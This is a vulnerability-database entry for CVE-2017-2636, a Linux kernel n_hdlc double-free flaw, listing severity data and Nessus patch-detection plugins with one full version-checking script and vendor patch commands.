Vulnerabilities > CVE-2017-2636 - Double Free vulnerability in multiple products

047910
CVSS 7.0 - HIGH
Attack vector
LOCAL
Attack complexity
HIGH
Privileges required
LOW
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
local
high complexity
linux
debian
CWE-415
nessus

Summary

Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.

Vulnerable Configurations

Part Description Count
OS
Linux
1366
OS
Debian
1

Common Weakness Enumeration (CWE)

Nessus

  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-0864-1.NASL
    descriptionThe SUSE Linux Enterprise 12 kernel was updated to fix the following security bugs : - CVE-2017-7184: The Linux kernel allowed local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) via unspecified vectors, as demonstrated during a Pwn2Own competition at CanSecWest 2017 (bnc#1030573, bnc#1028372). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bnc#1027565). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99090
    published2017-03-30
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99090
    titleSUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:0864-1)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from SUSE update advisory SUSE-SU-2017:0864-1.
    # The text itself is copyright (C) SUSE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(99090);
      script_version("3.6");
      script_cvs_date("Date: 2019/09/11 11:22:15");
    
      script_cve_id("CVE-2017-2636", "CVE-2017-7184");
    
      script_name(english:"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:0864-1)");
      script_summary(english:"Checks rpm output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SUSE host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The SUSE Linux Enterprise 12 kernel was updated to fix the following
    security bugs :
    
      - CVE-2017-7184: The Linux kernel allowed local users to
        obtain root privileges or cause a denial of service
        (heap-based out-of-bounds access) via unspecified
        vectors, as demonstrated during a Pwn2Own competition at
        CanSecWest 2017 (bnc#1030573, bnc#1028372).
    
      - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in
        the Linux kernel allowed local users to gain privileges
        or cause a denial of service (double free) by setting
        the HDLC line discipline (bnc#1027565).
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the SUSE security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.suse.com/show_bug.cgi?id=1027565"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.suse.com/show_bug.cgi?id=1028372"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.suse.com/show_bug.cgi?id=1030573"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.suse.com/security/cve/CVE-2017-2636/"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.suse.com/security/cve/CVE-2017-7184/"
      );
      # https://www.suse.com/support/update/announcement/2017/suse-su-20170864-1/
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?27b1b7d7"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "To install this SUSE Security Update use YaST online_update.
    Alternatively you can run the command listed for your product :
    
    SUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch
    SUSE-SLE-WE-12-SP2-2017-487=1
    
    SUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t
    patch SUSE-SLE-SDK-12-SP2-2017-487=1
    
    SUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t
    patch SUSE-SLE-RPI-12-SP2-2017-487=1
    
    SUSE Linux Enterprise Server 12-SP2:zypper in -t patch
    SUSE-SLE-SERVER-12-SP2-2017-487=1
    
    SUSE Linux Enterprise Live Patching 12:zypper in -t patch
    SUSE-SLE-Live-Patching-12-2017-487=1
    
    SUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch
    SUSE-SLE-HA-12-SP2-2017-487=1
    
    SUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch
    SUSE-SLE-DESKTOP-12-SP2-2017-487=1
    
    OpenStack Cloud Magnum Orchestration 7:zypper in -t patch
    SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-487=1
    
    To bring your system up-to-date, use 'zypper patch'."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-base");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-debugsource");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-extra");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:kernel-syms");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/29");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/30");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
    os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
    os_ver = os_ver[1];
    if (! preg(pattern:"^(SLED12|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver);
    
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);
    if (cpu >!< "x86_64") audit(AUDIT_ARCH_NOT, "x86_64", cpu);
    
    
    sp = get_kb_item("Host/SuSE/patchlevel");
    if (isnull(sp)) sp = "0";
    if (os_ver == "SLES12" && (! preg(pattern:"^(2)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP2", os_ver + " SP" + sp);
    if (os_ver == "SLED12" && (! preg(pattern:"^(2)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP2", os_ver + " SP" + sp);
    
    
    flag = 0;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-default-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-default-base-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-default-base-debuginfo-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-default-debuginfo-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-default-debugsource-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-default-devel-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"kernel-syms-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-default-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-default-debuginfo-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-default-debugsource-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-default-devel-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-default-extra-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-default-extra-debuginfo-4.4.49-92.14.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"kernel-syms-4.4.49-92.14.1")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "kernel");
    }
    
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3219-1.NASL
    descriptionAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97603
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97603
    titleUbuntu 14.04 LTS : linux vulnerability (USN-3219-1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2095-1.NASL
    descriptionThis update for the Linux Kernel 3.12.60-52_63 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102314
    published2017-08-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102314
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2095-1)
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2017-0056.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : - Revert
    last seen2020-06-01
    modified2020-06-02
    plugin id99162
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99162
    titleOracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0056)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2061-1.NASL
    descriptionThis update for the Linux Kernel 3.12.67-60_64_18 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102252
    published2017-08-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102252
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2061-1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2092-1.NASL
    descriptionThis update for the Linux Kernel 3.12.69-60_64_32 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102311
    published2017-08-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102311
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2092-1)
  • NASL familyVirtuozzo Local Security Checks
    NASL idVIRTUOZZO_VZLSA-2017-0892.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id101443
    published2017-07-13
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/101443
    titleVirtuozzo 6 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0892)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-3533.NASL
    descriptionDescription of changes: [4.1.12-61.1.33.el7uek] - Revert
    last seen2020-06-01
    modified2020-06-02
    plugin id99159
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99159
    titleOracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3533)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2017-1057.NASL
    descriptionAccording to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - A use-after-free flaw was found in the way the Linux kernel
    last seen2020-05-06
    modified2017-05-01
    plugin id99902
    published2017-05-01
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99902
    titleEulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1057)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2017-0892.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99316
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99316
    titleCentOS 6 : kernel (CESA-2017:0892)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2049-1.NASL
    descriptionThis update for the Linux Kernel 3.12.69-60_64_29 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102219
    published2017-08-07
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102219
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2049-1)
  • NASL familyVirtuozzo Local Security Checks
    NASL idVIRTUOZZO_VZLSA-2017-0933.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. These updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id101449
    published2017-07-13
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/101449
    titleVirtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0933)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-3567.NASL
    descriptionDescription of changes: [2.6.39-400.295.2.el6uek] - nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [Orabug: 25986995] {CVE-2017-7895} [2.6.39-400.295.1.el6uek] - ocfs2/o2net: o2net_listen_data_ready should do nothing if socket state is not TCP_LISTEN (Tariq Saeed) [Orabug: 25510857] - IB/CORE: sync the resouce access in fmr_pool (Wengang Wang) [Orabug: 23750748] - ipv6: Skip XFRM lookup if dst_entry in socket cache is valid (Jakub Sitnicki) [Orabug: 25534688] - uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug: 25549845] - ksplice: add sysctls for determining Ksplice features. (Jamie Iles) [Orabug: 25549845] - signal: protect SIGNAL_UNKILLABLE from unintentional clearing. (Jamie Iles) [Orabug: 25549845] - KVM: x86: fix emulation of
    last seen2020-06-01
    modified2020-06-02
    plugin id100235
    published2017-05-17
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100235
    titleOracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3567)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2096-1.NASL
    descriptionThis update for the Linux Kernel 3.12.61-52_66 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - A SUSE Linux Enterprise specific regression in tearing down network namespaces was fixed (bsc#1044878) - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102315
    published2017-08-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102315
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2096-1)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-849.NASL
    descriptionSeveral vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or have other impacts. CVE-2016-9588 Jim Mattson discovered that the KVM implementation for Intel x86 processors does not properly handle #BP and #OF exceptions in an L2 (nested) virtual machine. A local attacker in an L2 guest VM can take advantage of this flaw to cause a denial of service for the L1 guest VM. CVE-2017-2636 Alexander Popov discovered a race condition flaw in the n_hdlc line discipline that can lead to a double free. A local unprivileged user can take advantage of this flaw for privilege escalation. On systems that do not already have the n_hdlc module loaded, this can be mitigated by disabling it: echo >> /etc/modprobe.d/disable-n_hdlc.conf install n_hdlc false CVE-2017-5669 Gareth Evans reported that privileged users can map memory at address 0 through the shmat() system call. This could make it easier to exploit other kernel security vulnerabilities via a set-UID program. CVE-2017-5986 Alexander Popov reported a race condition in the SCTP implementation that can be used by local users to cause a denial of service (crash). The initial fix for this was incorrect and introduced further security issues (CVE-2017-6353). This update includes a later fix that avoids those. On systems that do not already have the sctp module loaded, this can be mitigated by disabling it: echo >> /etc/modprobe.d/disable-sctp.conf install sctp false CVE-2017-6214 Dmitry Vyukov reported a bug in the TCP implementation
    last seen2020-03-17
    modified2017-03-10
    plugin id97640
    published2017-03-10
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97640
    titleDebian DLA-849-1 : linux security update
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-3534.NASL
    descriptionDescription of changes: [3.8.13-118.17.4.el7uek] - Revert
    last seen2020-06-01
    modified2020-06-02
    plugin id99160
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99160
    titleOracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3534)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3220-2.NASL
    descriptionUSN-3220-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS. Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97606
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97606
    titleUbuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3220-2)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-1233.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6.7 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) Red Hat would like to thank Alexander Popov for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id100240
    published2017-05-17
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100240
    titleRHEL 6 : kernel (RHSA-2017:1233)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3220-3.NASL
    descriptionUSN-3220-1 fixed a vulnerability in the Linux kernel. This update provides the corresponding updates for the Linux kernel for Amazon Web Services (AWS). Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97633
    published2017-03-09
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97633
    titleUbuntu 16.04 LTS : linux-aws vulnerability (USN-3220-3)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2099-1.NASL
